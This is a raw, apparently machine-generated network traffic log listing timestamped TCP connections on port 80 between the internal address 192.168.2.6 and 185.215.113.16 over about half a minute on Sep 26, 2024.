Sep 26, 2024 15:42:33.573240995 CEST	52347	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:33.686801910 CEST	52347	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:33.687884092 CEST	52348	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:33.692068100 CEST	80	52347	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:33.692168951 CEST	52347	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:33.693016052 CEST	80	52348	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:33.693094969 CEST	52348	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:33.693254948 CEST	52348	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:33.698523998 CEST	80	52348	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:34.422604084 CEST	80	52348	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:34.422693968 CEST	52348	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:34.423326015 CEST	52348	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:34.428121090 CEST	80	52348	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:34.659630060 CEST	80	52348	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:34.659720898 CEST	52348	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:34.763226986 CEST	52348	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:34.763665915 CEST	52349	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:34.768330097 CEST	80	52348	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:34.768397093 CEST	52348	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:34.768441916 CEST	80	52349	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:34.768518925 CEST	52349	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:34.768619061 CEST	52349	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:34.773323059 CEST	80	52349	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:35.486648083 CEST	80	52349	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:35.486867905 CEST	52349	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:35.487473965 CEST	52349	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:35.492422104 CEST	80	52349	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:35.716969967 CEST	80	52349	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:35.717142105 CEST	52349	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:35.826329947 CEST	52349	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:35.826618910 CEST	52350	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:35.835928917 CEST	80	52350	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:35.836040974 CEST	52350	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:35.836194992 CEST	52350	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:35.837420940 CEST	80	52349	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:35.837523937 CEST	52349	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:35.840987921 CEST	80	52350	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:36.668822050 CEST	80	52350	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:36.668942928 CEST	52350	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:36.669954062 CEST	52350	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:36.674757957 CEST	80	52350	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:36.904921055 CEST	80	52350	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:36.905106068 CEST	52350	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:37.016124964 CEST	52350	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:37.016809940 CEST	52351	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:37.021502972 CEST	80	52350	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:37.021588087 CEST	52350	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:37.021811962 CEST	80	52351	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:37.021888971 CEST	52351	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:37.022066116 CEST	52351	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:37.027144909 CEST	80	52351	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:37.758265018 CEST	80	52351	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:37.758368969 CEST	52351	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:37.761336088 CEST	52351	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:37.766242027 CEST	80	52351	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:37.995116949 CEST	80	52351	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:37.995249987 CEST	52351	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:38.107160091 CEST	52351	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:38.107491970 CEST	52352	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:38.112945080 CEST	80	52352	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:38.112962008 CEST	80	52351	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:38.113020897 CEST	52352	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:38.113065004 CEST	52351	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:38.113203049 CEST	52352	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:38.118043900 CEST	80	52352	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:38.813474894 CEST	80	52352	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:38.813540936 CEST	52352	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:38.869442940 CEST	52352	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:38.874675989 CEST	80	52352	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:39.098179102 CEST	80	52352	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:39.098273993 CEST	52352	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:39.201683044 CEST	52352	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:39.202580929 CEST	52353	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:39.206938982 CEST	80	52352	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:39.206991911 CEST	52352	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:39.207593918 CEST	80	52353	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:39.207665920 CEST	52353	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:39.207828045 CEST	52353	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:39.213895082 CEST	80	52353	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:39.924778938 CEST	80	52353	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:39.924917936 CEST	52353	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:39.926194906 CEST	52353	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:39.932130098 CEST	80	52353	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:40.160979986 CEST	80	52353	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:40.161052942 CEST	52353	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:40.263376951 CEST	52353	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:40.263834000 CEST	52354	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:40.268623114 CEST	80	52353	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:40.268685102 CEST	52353	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:40.268841028 CEST	80	52354	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:40.268901110 CEST	52354	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:40.269043922 CEST	52354	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:40.273937941 CEST	80	52354	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:40.970058918 CEST	80	52354	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:40.970139980 CEST	52354	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:40.970940113 CEST	52354	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:41.278166056 CEST	52354	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:41.328433990 CEST	80	52354	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:41.328448057 CEST	80	52354	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:41.546993017 CEST	80	52354	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:41.547223091 CEST	52354	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:41.797861099 CEST	52354	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:41.798806906 CEST	52355	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:41.803044081 CEST	80	52354	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:41.803092003 CEST	52354	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:41.803643942 CEST	80	52355	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:41.803716898 CEST	52355	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:41.804069996 CEST	52355	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:41.809171915 CEST	80	52355	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:42.497658014 CEST	80	52355	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:42.497819901 CEST	52355	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:42.498722076 CEST	52355	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:42.503516912 CEST	80	52355	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:42.722876072 CEST	80	52355	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:42.723030090 CEST	52355	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:42.825706005 CEST	52355	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:42.826005936 CEST	52356	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:42.830909967 CEST	80	52356	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:42.831016064 CEST	52356	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:42.831140041 CEST	52356	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:42.831217051 CEST	80	52355	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:42.831288099 CEST	52355	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:42.836081982 CEST	80	52356	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:43.535562038 CEST	80	52356	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:43.535778046 CEST	52356	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:43.536477089 CEST	52356	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:43.541290998 CEST	80	52356	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:43.766567945 CEST	80	52356	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:43.766716003 CEST	52356	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:43.872665882 CEST	52356	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:43.873059034 CEST	52357	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:43.878184080 CEST	80	52356	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:43.878272057 CEST	52356	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:43.878962994 CEST	80	52357	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:43.879184008 CEST	52357	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:43.879252911 CEST	52357	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:43.884063005 CEST	80	52357	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:44.609877110 CEST	80	52357	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:44.610034943 CEST	52357	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:44.610804081 CEST	52357	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:44.615612030 CEST	80	52357	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:44.842838049 CEST	80	52357	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:44.843121052 CEST	52357	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:44.952624083 CEST	52357	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:44.952811003 CEST	52359	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:44.958267927 CEST	80	52357	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:44.958370924 CEST	52357	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:44.958547115 CEST	80	52359	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:44.958631992 CEST	52359	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:44.958792925 CEST	52359	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:44.964118958 CEST	80	52359	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:45.657520056 CEST	80	52359	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:45.657658100 CEST	52359	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:45.658691883 CEST	52359	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:45.663568974 CEST	80	52359	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:45.883124113 CEST	80	52359	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:45.883188963 CEST	52359	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:45.997803926 CEST	52359	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:45.998264074 CEST	52360	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:46.003298044 CEST	80	52360	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:46.003443003 CEST	52360	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:46.003679037 CEST	52360	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:46.003747940 CEST	80	52359	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:46.003812075 CEST	52359	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:46.008691072 CEST	80	52360	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:46.717406034 CEST	80	52360	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:46.717530012 CEST	52360	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:46.718281984 CEST	52360	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:46.724159956 CEST	80	52360	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:46.948828936 CEST	80	52360	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:46.949034929 CEST	52360	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:47.060367107 CEST	52360	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:47.060808897 CEST	52361	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:47.371958971 CEST	52360	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:47.981389999 CEST	52360	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:48.059463024 CEST	52361	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:48.061732054 CEST	80	52361	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:48.061753035 CEST	80	52360	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:48.061767101 CEST	80	52360	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:48.061791897 CEST	80	52360	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:48.061872005 CEST	52361	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:48.061914921 CEST	52360	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:48.062160969 CEST	52361	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:48.064884901 CEST	80	52361	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:48.064946890 CEST	52361	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:48.067070961 CEST	80	52361	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:48.782737017 CEST	80	52361	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:48.782861948 CEST	52361	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:48.784013033 CEST	52361	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:48.788856030 CEST	80	52361	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:49.012455940 CEST	80	52361	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:49.012681007 CEST	52361	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:49.122849941 CEST	52361	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:49.123164892 CEST	52362	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:49.128257036 CEST	80	52361	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:49.128340006 CEST	80	52362	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:49.128354073 CEST	52361	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:49.128431082 CEST	52362	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:49.128546953 CEST	52362	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:49.133495092 CEST	80	52362	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:49.829962969 CEST	80	52362	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:49.830063105 CEST	52362	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:49.830853939 CEST	52362	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:49.835792065 CEST	80	52362	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:50.055825949 CEST	80	52362	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:50.055963039 CEST	52362	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:50.169596910 CEST	52362	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:50.169905901 CEST	52363	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:50.175014019 CEST	80	52362	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:50.175105095 CEST	52362	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:50.176201105 CEST	80	52363	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:50.176291943 CEST	52363	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:50.176501989 CEST	52363	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:50.181493998 CEST	80	52363	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:50.910456896 CEST	80	52363	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:50.910603046 CEST	52363	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:50.911456108 CEST	52363	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:50.916260004 CEST	80	52363	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:51.144068956 CEST	80	52363	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:51.144181967 CEST	52363	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:51.250941992 CEST	52363	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:51.251398087 CEST	52364	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:51.256175041 CEST	80	52363	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:51.256237030 CEST	80	52364	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:51.256266117 CEST	52363	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:51.256370068 CEST	52364	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:51.256515980 CEST	52364	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:51.261420965 CEST	80	52364	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:51.982882023 CEST	80	52364	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:51.982956886 CEST	52364	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:51.983774900 CEST	52364	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:51.988579988 CEST	80	52364	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:52.219329119 CEST	80	52364	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:52.219400883 CEST	52364	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:52.325663090 CEST	52364	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:52.326004028 CEST	52365	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:52.330816031 CEST	80	52364	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:52.330877066 CEST	52364	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:52.331387997 CEST	80	52365	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:52.331468105 CEST	52365	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:52.331569910 CEST	52365	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:52.336407900 CEST	80	52365	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:53.042387009 CEST	80	52365	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:53.042521954 CEST	52365	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:53.043203115 CEST	52365	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:53.048008919 CEST	80	52365	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:53.270215034 CEST	80	52365	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:53.270447016 CEST	52365	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:53.372657061 CEST	52365	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:53.373084068 CEST	52366	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:53.378015995 CEST	80	52366	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:53.378138065 CEST	52366	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:53.378290892 CEST	52366	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:53.378329992 CEST	80	52365	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:53.378386974 CEST	52365	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:53.383311033 CEST	80	52366	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:54.093739033 CEST	80	52366	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:54.093833923 CEST	52366	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:54.094599962 CEST	52366	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:54.099428892 CEST	80	52366	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:54.327029943 CEST	80	52366	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:54.327115059 CEST	52366	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:54.470011950 CEST	52366	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:54.470318079 CEST	52367	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:54.476218939 CEST	80	52367	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:54.476305008 CEST	52367	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:54.481694937 CEST	80	52366	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:54.481764078 CEST	52366	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:54.488035917 CEST	52367	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:54.492851019 CEST	80	52367	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:55.171766996 CEST	80	52367	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:55.171839952 CEST	52367	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:55.172557116 CEST	52367	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:55.177622080 CEST	80	52367	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:55.395965099 CEST	80	52367	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:55.396061897 CEST	52367	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:55.497884989 CEST	52367	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:55.498250008 CEST	52368	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:55.503092051 CEST	80	52368	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:55.503171921 CEST	52368	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:55.503247976 CEST	80	52367	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:55.503298998 CEST	52367	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:55.503397942 CEST	52368	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:55.508189917 CEST	80	52368	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:56.213516951 CEST	80	52368	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:56.213638067 CEST	52368	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:56.214476109 CEST	52368	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:56.219417095 CEST	80	52368	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:56.442953110 CEST	80	52368	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:56.443007946 CEST	52368	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:56.546413898 CEST	52368	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:56.546736956 CEST	52369	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:56.551681995 CEST	80	52368	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:56.551814079 CEST	52368	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:56.551983118 CEST	80	52369	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:56.552051067 CEST	52369	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:56.552180052 CEST	52369	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:56.557430029 CEST	80	52369	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:57.260196924 CEST	80	52369	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:57.260260105 CEST	52369	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:57.349971056 CEST	52369	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:57.354830980 CEST	80	52369	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:57.578777075 CEST	80	52369	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:57.579018116 CEST	52369	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:57.685923100 CEST	52369	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:57.686264992 CEST	52370	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:57.691169024 CEST	80	52369	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:57.691184998 CEST	80	52370	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:57.691324949 CEST	52369	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:57.691437006 CEST	52370	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:57.691884995 CEST	52370	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:57.696871042 CEST	80	52370	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:58.420772076 CEST	80	52370	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:58.420872927 CEST	52370	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:58.421725035 CEST	52370	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:58.426716089 CEST	80	52370	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:58.660734892 CEST	80	52370	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:58.660860062 CEST	52370	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:58.763284922 CEST	52370	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:58.763684034 CEST	52371	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:58.769004107 CEST	80	52371	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:58.769130945 CEST	80	52370	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:58.769139051 CEST	52371	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:58.769351006 CEST	52370	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:58.769398928 CEST	52371	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:58.774243116 CEST	80	52371	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:59.486648083 CEST	80	52371	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:59.486782074 CEST	52371	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:59.487883091 CEST	52371	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:59.492731094 CEST	80	52371	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:59.717890978 CEST	80	52371	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:59.718053102 CEST	52371	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:59.868197918 CEST	52371	80	192.168.2.6	185.215.113.16
